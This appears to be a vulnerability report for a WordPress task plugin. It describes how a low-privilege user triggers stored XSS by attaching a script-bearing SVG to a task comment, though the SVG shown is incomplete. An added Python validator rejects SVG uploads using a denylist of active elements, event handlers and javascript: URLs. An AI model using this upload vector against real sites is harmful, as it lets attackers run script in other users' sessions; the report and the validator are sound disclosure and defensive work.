Create an SVG with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" ""><svg version="1.1" baseProfile="full" xmlns="">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">

As any authenticated user, such as subscriber:
- Go to http://vuln.local/wp-admin/admin.php?page=wppm-tasks
- Choose any task (create one if there aren't any)
- Focus on "Write a comment".
- Click on "Attach Files" and select the SVG created above
- Click on "Send".
- View the attached SVG by clicking on its URL, which will trigger the XSS
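
A server-side check that would reject this kind of attachment at upload time, as an added example (not code from the plugin or from the original report). The function name, the element list and the sample files are assumptions constructed for illustration; the samples reuse the triangle from the SVG above with placeholder script bodies.

```python
import xml.etree.ElementTree as ET

# Elements that can run or embed active content inside an SVG (assumed denylist).
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src"}


def local(name: str) -> str:
    """Strip a '{namespace}' prefix and lowercase the name."""
    return name.rsplit("}", 1)[-1].lower()


def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means nothing was found."""
    if b"<!ENTITY" in data.upper():
        return ["entity declaration in DOCTYPE"]  # refuse before parsing
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        return ["not well-formed XML"]  # fail closed: it cannot be inspected
    findings = []
    if local(root.tag) != "svg":
        findings.append("root element is not <svg>")
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            name = local(attr)
            scheme = "".join(value.split()).lower()  # drop whitespace used to hide a scheme
            if name.startswith("on"):
                findings.append(f"event handler {name} on <{tag}>")
            elif name in URL_ATTRS and scheme.startswith(("javascript:", "data:")):
                findings.append(f"scripted URL in {name} on <{tag}>")
    return findings


# Constructed samples: the page's triangle, with and without active content.
SHAPE = b'<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>'
CLEAN = b'<svg version="1.1" xmlns="http://www.w3.org/2000/svg">' + SHAPE + b"</svg>"
SCRIPTED = CLEAN.replace(b"</svg>", b'<script type="text/javascript">/* placeholder */</script></svg>')
HANDLER = CLEAN.replace(b"<polygon ", b'<polygon onclick="/* placeholder */" ')
TRUNCATED = CLEAN[:-6] + b'<script type="text/javascript">'  # unclosed, like a cut-off file

if __name__ == "__main__":
    for label, sample in [("clean", CLEAN), ("scripted", SCRIPTED),
                          ("handler", HANDLER), ("truncated", TRUNCATED)]:
        print(label, svg_findings(sample))
```

An empty result only means these checks found nothing; a denylist like this is a gate for uploads, not a sanitizer.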